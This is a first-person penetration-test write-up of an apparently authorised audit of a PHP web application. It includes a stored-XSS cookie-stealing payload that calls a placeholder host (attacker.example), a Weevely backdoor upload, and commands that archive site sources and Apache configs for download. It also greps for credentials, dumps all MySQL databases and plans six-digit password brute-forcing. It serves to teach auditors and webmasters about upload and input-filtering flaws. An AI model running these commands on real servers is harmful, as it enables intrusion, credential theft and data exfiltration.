On the one hand, this story is based on a real security audit. If I could tell it without cuts, it would make a case study from which novice web application security auditors, webmasters, and administrators could learn something new. But, as with any case study, there is no guarantee that you will encounter anything similar in your own practice or that the information will prove useful.
On the other hand, I can describe some moments only in general terms. Therefore, this write-up will contain as few commands and screenshots as possible (perhaps none at all).
The site was a web application written from scratch. To use its functions you need to enter a login and password, but there is a guest account, and its credentials are published right on the main page of the site.
Performed actions are saved in History. An action has a title and some text. It turned out that the stored fields are not filtered for special characters and keywords, so we quickly managed to find and confirm an XSS vulnerability by entering test code into those fields.
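The exact payload was cut from the write-up, but a classic probe for this kind of stored XSS looks like the following (a hypothetical example, not the one actually used):

```shell
# Hypothetical stored-XSS probe: if the field is not sanitized, this
# markup is saved verbatim and the script fires when History is viewed.
payload='<script>alert(document.cookie)</script>'
printf '%s\n' "$payload"
```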
Using this vulnerability, it is possible, for example, to steal cookies from other users. The problem is that each user apparently has their own History. So the most I can do in this situation is grab the cookies of users with exactly the same privileges as mine – that is, only of users who logged in under the guest account. Perhaps the admin can see the full History of all users – but that is not certain. Besides, I would have to figure out how to provoke him into opening the History – otherwise he might next visit it in a year, or two, or never.
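To actually collect cookies rather than just display them, the injected script typically sends them to a host controlled by the auditor. A hypothetical example (attacker.example is a placeholder):

```shell
# Hypothetical exfiltration payload: the victim's browser requests an
# "image" from the auditor's server, leaking document.cookie in the URL.
payload='<script>new Image().src="https://attacker.example/c?"+encodeURIComponent(document.cookie);</script>'
printf '%s\n' "$payload"
```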
Since special characters are clearly not filtered and the data is most likely stored in a database, there may well also be a SQL injection vulnerability that would allow dumping the site's database. But I did not have time to check: a much simpler vulnerability turned up – insecure file upload.
The bottom line: when creating a new action, several input fields were available to me – in them I found the XSS and could have probed for SQL injection. But when opening a saved action from History, another field appeared on the page – for uploading a file!
My joy was moderate: on the one hand, many sites allow file uploads, but thanks to restrictions on the extensions of uploaded files, as well as on how they can be accessed, it is usually almost impossible to upload code that will be executed on the server. Still, the sloppy filtering of the text fields gave me some hope.
I created a test file.
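The file's contents were cut from the write-up, but judging by the result it was something as minimal as this (my reconstruction; the file name is arbitrary):

```shell
# A minimal PHP probe: if the server executes uploaded files,
# opening this one in a browser shows the phpinfo() page.
cat > probe.php <<'EOF'
<?php phpinfo(); ?>
EOF
```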
And I uploaded it to the server. The server showed me a link to this file – so the file was there! I clicked the link and, instead of the file being downloaded or its contents being shown, the file was executed: I saw the information that the phpinfo() function outputs.
What are the programmer's mistakes:
Such a disorderly style of programming cannot be combined with a public account. That is, if the login information were not published on the main page, finding and exploiting these vulnerabilities would have taken much longer.
And more importantly: when writing code, you should always filter user input and restrict which files can be uploaded to the server. Even if you program "for yourself" and keep the files on a local server on your own computer, trouble can still happen: someone can connect to your web server over the local network (for example, when you are on public Wi-Fi), or your computer may be reachable directly if it has a public IP. Obviously, for a public site the code should be written with constant attention to security.
At first I wanted to use the simplest option – c99unlimited.php. This shell looks like a web-based file manager, making it convenient to browse directories and download files. But it did not work for me – it resulted in an Error 500. Apparently the server has some kind of incompatibility with it.
This is not a problem at all: Webshells contains plenty of different shells, and you could spend a long time picking one you like, but I decided to use my favorite – Weevely. Although it only has a command-line interface, I like it all the more for that.
Create a new backdoor (yes, the password is just a number 1):
weevely generate 1 test.php
I uploaded it to the server and connected to it:
weevely https://site.ru/upload/8579.php 1
After connecting, Weevely showed that I was in the /var/www/XX1/tmp folder.
This can be double-checked with the pwd command.
Let's see what permissions I have on this folder:
ls -dl .
drwxrwxrwx 2 XX1 root 4096 Apr 21 14:16 .
From this information it follows that the owner of the folder is the user XX1, but everyone has write permission.
By the way, who am I on this server? The whoami command gives the answer: I am the www-data user.
By the way, why did I suddenly rush to look for a folder with write permission? The point is that I need to download the files with the source code for further analysis "in a calm atmosphere". There are many of these files, and downloading them one by one would take a lot of time. So the plan is to pack all the files into an archive and download the archive.
Of course, I could use the /tmp directory, which is always writable by everyone. But from /tmp I can only download using Weevely. If instead I manage to save the archive into a web server folder, I can download it directly with a web browser or a file download tool. This matters especially for very large files: it may be necessary to resume the download after a broken connection, which is impossible from the Weevely command line.
It is clear that if we are in the /var/www/XX1/tmp folder, then the web server folder is /var/www/. Let's see what's in it:
ls -l /var/www/
There are folders of other sites – a total of 14 items.
To pack files into an archive with the zip command, I need the -r option to recursively add everything inside the directories. The command is run as follows:
zip -r archive_name.zip directory_for_archiving
The directory to archive is /var/www/, and I'll save the archive to the /tmp directory (not to the folder with the sites, because then we would be trying to save the archive into a folder that is itself being added to the archive – this could cause an error).
I run the command:
zip -r /tmp/archive.zip /var/www/
The command returned this message:
sh: 1: zip: not found
Damn, zip is not installed on this server. I could use the archiving functions built into Weevely, but I'll try another program first:
tar czf /tmp/archive.tgz /var/www/
The tar program, however, turned out to be present on the server: the command completed without any messages, which for tar means success.
I move the archive to the web server folder, where it is now available for download even using a browser:
mv /tmp/archive.tgz /var/www/XX1/tmp
To find out the size of all subfolders in the /var/www/:
du -sh /var/www/*
If you need to download only some folders, this is done by a command like this:
tar czf archive.tgz folder_in_archive_1 folder_in_archive_2 folder_in_archive_3 folder_in_archive_4
The source code is a very valuable trophy, and it will help us a lot later. But, as I already said, there are many site folders on this server – that is, it hosts many sites.
A list of all loaded settings and processed virtual hosts can be obtained with the -S option, and with -t -D DUMP_INCLUDES you can see all the configuration files in use. One catch: the web server executable may be called either httpd or apache2, depending on the system. On Debian derivatives the binary is called apache2; on Arch Linux derivatives it is called httpd. In principle, it is no problem to try both commands and see which one works:
httpd -t -D DUMP_INCLUDES
apache2 -t -D DUMP_INCLUDES
As I said, under normal conditions these options show all configuration files and all virtual hosts. But apparently the programmer who wrote the site's code also configured the web server: instead of the expected information, I only get an error message about one of the configuration files – an SSL certificate is missing. By the way, this means that the next time the computer, or just the web server, is restarted, Apache will in theory fail to start, since this is (supposedly) a fatal error.
Okay, let's check by hand. If the binary is called apache2, then the configuration files are stored in /etc/apache2.
The main Apache configuration file is /etc/apache2/apache2.conf.
Other configuration files are stored in the /etc/apache2/conf-available folder, and in the /etc/apache2/conf-enabled folder you can find out which of them are enabled.
In the /etc/apache2/mods-enabled folder, you can see which Apache modules are enabled.
In the /etc/apache2/sites-available folder, you can find out the settings for which sites are provided, and in the /etc/apache2/sites-enabled folder – which of them are currently active.
Unfortunately, I can't show you the contents; I can only say that there were 18 configuration files in sites-available. Each site's file contains at least two mandatory directives: ServerName and DocumentRoot.
This technique lets you find out which other sites this server hosts and where the source code of each of them is located.
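For example, the ServerName and DocumentRoot directives can be pulled out of all the site configs at once (assuming the Debian-style /etc/apache2 layout):

```shell
# ServerName reveals which site a config serves;
# DocumentRoot reveals where its source code lives on disk.
grep -rhE 'ServerName|DocumentRoot' /etc/apache2/sites-available/
```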
I just grab them all:
tar czf /var/www/XX1/upload/apache_archive.tgz /etc/apache2/
If we have access to the file system, getting the MySQL password is easy.
As described above (by analysing the virtual hosts and looking through the contents of the site folders), we find the address of phpMyAdmin. But phpMyAdmin may be absent – no problem, you can work with the database through the console.
The most important thing is to analyze the source code of the sites and find the credentials there. To simplify the task, you can search through the contents of the files, paying special attention to lines that set up database connections or contain password-like strings.
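A quick way to do this is to grep the web root for typical connection code (the patterns below are only a starting point, adjust them to the codebase at hand):

```shell
# Search all PHP sources for database-connection calls and
# password-looking identifiers; -n prints line numbers, -i ignores case.
grep -rniE 'mysqli?_connect|new PDO|DB_PASSWORD|passw' /var/www/ --include='*.php'
```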
As well as to files with telling names, for example connectdb.php.
Weevely has a command to connect to MySQL from the command line:
:sql_console -user USER -passwd PASSWORD -host localhost
Or, if MySQL allows remote connections, you can connect to the host directly:
mysql -u USER -pPASSWORD -h SERVER_IP
Once connected, you can list the databases:
SHOW DATABASES;
In the same way you can view the tables in a database (SHOW TABLES;) and the contents of the tables (SELECT * FROM table_name;).
If you need to dump all databases for download, this is done with the command:
mysqldump -u USER -pPASSWORD --all-databases > all-databases.sql
There is no space between the -p option and the PASSWORD – otherwise an error occurs.
The database revealed a lot of interesting information. But the most interesting find is the list of users with their passwords.
We have usernames and passwords (as well as emails and other profile information). The administrator's password for logging into the service turned out to be exactly the same as the root password for MySQL. Let me recap in case you lost track: we found the MySQL password in the source code of the site files, and the service (site) admin password in the database – and they turned out to be identical.
This is important – users tend to reuse the same passwords, which, by the way, is a vulnerability in itself.
But even more interesting is the analysis of all the user passwords: almost all of them are six-digit numbers! Apparently the credentials were generated and issued by the administrator, and the administrator tends to create passwords of the same type – take note of this. So if I have to brute-force services on this server (and I will have to), I already know what the dictionary will be: the complete list of six-digit numbers.
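Such a dictionary is trivial to generate, for example:

```shell
# All zero-padded six-digit numbers, one per line (000000..999999);
# use `seq 100000 999999` instead if leading zeros are not allowed.
seq -w 0 999999 > six_digit_dict.txt
```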
And in general: if the passwords repeat, it makes sense to look for other services – the logins and passwords we already have may well fit there too.
So: the server is compromised through a vulnerable web application.
Already at this stage I can write a report for the customer (the website owner) and finish this website security audit.
Report summary: everything is bad.
But this story also has a second part. See the continuation in 'How to hack websites (part 2)'.